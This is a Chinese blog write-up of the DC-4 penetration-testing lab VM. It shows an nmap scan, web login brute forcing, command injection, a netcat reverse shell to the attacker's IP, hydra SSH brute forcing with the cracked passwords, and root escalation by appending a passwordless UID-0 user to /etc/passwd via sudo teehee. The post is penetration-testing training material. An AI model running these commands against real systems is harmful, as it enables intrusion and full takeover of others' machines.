DC-4渗透实战

作者: 城市烈人 | 来源:发表于2019-06-01 21:34 被阅读65次

    该靶机提权思路有点意思,采用修改passwd文件进行root 操作
    靶机IP:192.168.8.160

    nmap全扫

    nmap -sS -Pn -A -p- -n 192.168.8.160
    
    image.png

    就基本的常规渗透思路吧

    web渗透

    image.png

    上来就是登录界面

    http://192.168.8.160/images/ ,也没什么重要的线索

    image.png

    后台爆破

    无奈只能用大字典跑一遍看看


    image.png

    发现了一个 登录口令

    admin   happy
    

    登录后台

    登录可以发现command命令执行


    image.png

    抓个包试试,执行些命令

    果然可以执行任意命令


    image.png

    命令执行-nc反弹getshell

    尝试nc反弹

    nc 192.168.8.253 4444 -e /bin/bash
    

    kali中先开启监听


    image.png

    成功反弹

    提权(修改passwd)

    进入home目录下,发现了三个用户


    image.png

    发现只有jim用户下有线索,在backups目录下有个密码备份 old-password.bak


    image.png

    想必就是jim用户的密码吧

    拿来ssh登录爆破下

    hydra直接爆

    hydra -l jim -P jim ssh://192.168.8.160
    
    image.png

    爆破成功,登录口令为

    jim  jibril04
    

    jim用户ssh登录

    登录后,打开查看mbox,是root用户发来的,


    image.png

    登录不久后,发现提示了一封新邮件

    image.png

    进入 该路径下看看


    image.png

    想必这就是 Charles 的密码

    charles   ^xHhA&hvim0y
    

    切换用户charles

    image.png
    sudo -l
    

    查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee

    get root

    之前做过一些渗透是用定时器提权,或者是篡改 passwd 写入一个具有root权限的伪用户进行get root

    添加一个 hack用户,并使用teehee执行写入 passwd中

    echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
    

    参数解释

    #如:admin:x:0:0::/home/admin:/bin/bash
    
    #[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
    

    修改完passwd文件,重启一下靶机,直接可以无密码切换hack用户

    直接

    su hack
    
    image.png

    直接无密码进入,是root权限

    get flag

    image.png

    总结

    1、该靶机渗透在web信息收集阶段并没有什么有用的线索,就直接想到后台爆破即可

    2、在反弹getshell后发现一封邮件,拿到新用户的登录口令

    3、进入新用户的目录中,发现其具有超级用户的权限执行,采用修改passwd文件,添加一个免密码的超级用户,进行提权

    DC-4靶机百度云下载
    链接:https://pan.baidu.com/s/1ftpEws_F4_v2OYpruVxkYw
    提取码:bj2t

    相关文章

      网友评论

        本文标题:DC-4渗透实战

        本文链接:https://www.haomeiwen.com/subject/fmhztctx.html